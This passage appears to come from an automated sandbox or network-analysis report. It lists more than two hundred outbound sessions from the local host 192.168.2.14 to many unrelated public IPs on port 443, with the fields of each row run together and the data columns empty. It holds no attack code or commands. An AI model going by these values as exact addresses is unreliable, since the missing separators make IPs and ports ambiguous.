                                      20961192.168.2.1433488112.56.9.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20962192.168.2.1459742186.68.235.143443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20963192.168.2.143777842.35.254.33443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20964192.168.2.143706032.186.77.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20965192.168.2.1450126103.9.131.200443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20966192.168.2.1442366140.216.79.103443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20967192.168.2.1435648114.106.155.29443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20968192.168.2.1453256125.147.48.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20969192.168.2.143402693.0.49.146443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20970192.168.2.1437498220.49.157.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20971192.168.2.144446480.181.160.139443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20972192.168.2.143542649.17.198.208443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20973192.168.2.1453666161.229.237.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20974192.168.2.1445020129.123.162.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20975192.168.2.1449040222.157.233.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20976192.168.2.1436874171.226.37.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20977192.168.2.1450894114.68.75.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20978192.168.2.1458880134.2.112.139443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20979192.168.2.143366237.176.228.54443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20980192.168.2.1438864119.83.110.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20981192.168.2.1439718194.191.243.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20982192.168.2.145024858.220.17.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20983192.168.2.145411258.155.138.68443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20984192.168.2.143601291.24.69.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20985192.168.2.1445518168.236.242.0443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20986192.168.2.1436264132.37.126.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20987192.168.2.1446786146.59.97.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20988192.168.2.143680282.160.195.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20989192.168.2.143355690.239.229.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20990192.168.2.1450570135.0.161.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20991192.168.2.145037012.187.72.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20992192.168.2.1455190151.130.127.249443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20993192.168.2.145143634.227.21.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20994192.168.2.146083814.123.237.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20995192.168.2.144870012.1.235.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20996192.168.2.1433232170.126.22.225443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20997192.168.2.143861246.51.250.149443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20998192.168.2.144848884.51.180.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20999192.168.2.1446592156.203.222.39443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21000192.168.2.1455810128.174.11.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21001192.168.2.145735813.125.70.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21002192.168.2.143963857.35.48.134443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21003192.168.2.145202296.215.47.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21004192.168.2.1440970148.140.157.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21005192.168.2.1446286121.113.168.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21006192.168.2.1457150107.33.53.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21007192.168.2.144268246.247.58.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21008192.168.2.1433696184.147.39.33443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21009192.168.2.14384909.80.148.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21010192.168.2.144052293.139.99.88443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21011192.168.2.1443468132.210.65.200443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21012192.168.2.145411064.151.203.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21013192.168.2.1458642187.246.25.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21014192.168.2.1436742102.33.94.250443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21015192.168.2.1442540145.188.146.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21016192.168.2.1439844151.18.124.100443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21017192.168.2.144922445.64.162.1443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21018192.168.2.143919245.142.83.115443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21019192.168.2.1443020195.253.220.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21020192.168.2.1451980199.149.196.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21021192.168.2.1448254194.118.180.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21022192.168.2.144338668.249.49.87443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21023192.168.2.145090848.230.167.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21024192.168.2.143796034.165.1.226443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21025192.168.2.1452130202.92.255.115443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21026192.168.2.1457054208.53.61.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21027192.168.2.1454060206.175.240.189443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21028192.168.2.145762485.38.215.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21029192.168.2.1442918177.237.26.153443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21030192.168.2.14364781.51.140.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21031192.168.2.1457664170.50.95.33443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21032192.168.2.145319672.44.33.45443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21033192.168.2.14337349.231.115.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21034192.168.2.145315240.221.198.121443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21035192.168.2.1445184217.23.37.250443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21036192.168.2.1452484144.141.159.46443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21037192.168.2.143857264.38.207.100443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21038192.168.2.1437814111.213.48.215443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21039192.168.2.146055214.105.34.35443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21040192.168.2.143754054.129.53.171443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21041192.168.2.1441606150.112.53.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21042192.168.2.1448082174.115.242.176443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21043192.168.2.1451868185.137.71.35443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21044192.168.2.144993099.230.83.87443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21045192.168.2.143917468.44.199.226443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21046192.168.2.144432643.131.144.249443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21047192.168.2.1433036179.213.184.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21048192.168.2.1445156122.132.155.39443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21049192.168.2.1455028176.57.101.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21050192.168.2.1445512160.114.109.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21051192.168.2.1456808113.176.3.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21052192.168.2.145604832.17.108.29443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21053192.168.2.1455748101.197.105.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21054192.168.2.1460532200.250.169.105443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21055192.168.2.1433414195.219.162.127443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21056192.168.2.144995463.166.175.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21057192.168.2.1457394219.60.239.149443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21058192.168.2.1453974162.210.251.233443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21059192.168.2.1460724195.51.103.193443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21060192.168.2.14595089.178.156.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21061192.168.2.145615851.25.87.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21062192.168.2.143874687.98.199.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21063192.168.2.145656498.133.251.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21064192.168.2.1443564163.87.160.103443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21065192.168.2.14600769.199.145.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21066192.168.2.143918832.131.29.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21067192.168.2.1457580178.45.58.60443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21068192.168.2.145834414.249.136.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21069192.168.2.145299289.150.38.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21070192.168.2.1459988163.196.134.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21071192.168.2.1457534101.136.224.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21072192.168.2.14363702.168.145.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21073192.168.2.14469689.254.11.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21074192.168.2.1448004157.43.128.234443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21075192.168.2.1437504190.255.35.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21076192.168.2.1451194137.228.22.149443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21077192.168.2.1458876120.197.233.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21078192.168.2.1452372143.125.174.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21079192.168.2.143937220.90.18.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21080192.168.2.1446420112.39.242.226443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21081192.168.2.143637669.23.73.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21082192.168.2.1439364149.98.206.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21083192.168.2.1452706136.235.240.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21084192.168.2.145436440.78.140.129443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21085192.168.2.145364827.81.223.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21086192.168.2.145828494.45.119.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21087192.168.2.1442128143.60.128.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21088192.168.2.1433350137.194.171.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21089192.168.2.1437050104.194.54.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21090192.168.2.144771035.110.44.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21091192.168.2.1441442187.202.133.170443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21092192.168.2.14439884.164.94.17443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21093192.168.2.1439706207.223.120.115443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21094192.168.2.1435156116.185.11.46443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21095192.168.2.1443146159.116.179.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21096192.168.2.1451554134.42.183.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21097192.168.2.145059041.12.114.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21098192.168.2.1457706108.197.210.139443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21099192.168.2.145597095.130.221.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21100192.168.2.1443144213.91.92.77443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21101192.168.2.1446912161.114.252.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21102192.168.2.144908691.191.16.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21103192.168.2.1436144104.73.250.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21104192.168.2.1446994202.40.69.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21105192.168.2.144188276.134.235.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21106192.168.2.143794084.118.106.123443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21107192.168.2.143977899.149.173.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21108192.168.2.1453298108.52.152.44443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21109192.168.2.1456092108.178.162.51443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21110192.168.2.144838838.180.45.171443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21111192.168.2.1458078180.136.4.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21112192.168.2.1447386175.32.240.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21113192.168.2.1455530150.118.148.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21114192.168.2.1438290161.66.231.59443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21115192.168.2.1459590166.104.228.37443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21116192.168.2.1456808133.100.249.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21117192.168.2.144475035.35.221.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21118192.168.2.1460684122.28.174.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21119192.168.2.14359822.142.193.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21120192.168.2.14471164.184.210.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21121192.168.2.1433694160.235.85.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21122192.168.2.1450066203.97.84.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21123192.168.2.1442268181.34.157.25443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21124192.168.2.146077813.124.24.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21125192.168.2.14450961.22.140.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21126192.168.2.1439192151.227.224.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21127192.168.2.1437188199.23.54.17443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21128192.168.2.1446064151.210.116.253443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21129192.168.2.143453012.126.221.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21130192.168.2.1459076221.177.78.100443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21131192.168.2.1432976181.22.218.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21132192.168.2.143780647.81.171.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21133192.168.2.1443624189.83.148.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21134192.168.2.143538223.140.16.234443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21135192.168.2.145893467.92.74.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21136192.168.2.1439328195.167.54.33443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21137192.168.2.1437214168.188.101.170443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21138192.168.2.1446872190.175.13.168443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21139192.168.2.1459508210.124.86.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21140192.168.2.145871671.9.177.178443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21141192.168.2.1451896143.214.58.149443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21142192.168.2.1439190205.152.114.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21143192.168.2.14379982.144.121.205443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21144192.168.2.1432842182.214.25.5443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21145192.168.2.1453916181.48.186.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21146192.168.2.1441524186.24.113.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21147192.168.2.1455980187.194.98.235443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21148192.168.2.144512274.175.196.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21149192.168.2.14571762.158.68.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21150192.168.2.1448198222.186.67.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21151192.168.2.143499214.251.25.231443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21152192.168.2.1440552144.123.11.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21153192.168.2.1460170102.22.229.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21154192.168.2.1460686181.78.46.35443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21155192.168.2.1449758188.216.129.173443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21156192.168.2.1435980185.105.62.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21157192.168.2.145387485.224.143.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21158192.168.2.1445798204.185.104.173443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21159192.168.2.1452834142.137.105.175443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21160192.168.2.1440362176.128.203.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21161192.168.2.145134481.30.161.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21162192.168.2.144895267.254.74.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21163192.168.2.1460534113.160.126.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21164192.168.2.1443124113.66.16.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21165192.168.2.144356812.143.116.207443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21166192.168.2.145226290.109.19.18443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21167192.168.2.1443216108.214.242.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21168192.168.2.1452802148.155.206.218443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21169192.168.2.14378341.39.189.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21170192.168.2.145955495.219.243.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21171192.168.2.1444404174.169.203.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21172192.168.2.143754447.216.97.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21173192.168.2.145339284.163.11.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21174192.168.2.144302851.191.136.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21175192.168.2.14538102.11.236.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21176192.168.2.144372061.252.60.159443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21177192.168.2.1433754132.119.225.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21178192.168.2.143413020.99.70.249443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21179192.168.2.1441790117.178.73.143443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21180192.168.2.1443382142.135.8.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21181192.168.2.1451592151.156.125.239443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21182192.168.2.14532902.19.103.167443
                                      TimestampBytes transferredDirectionData


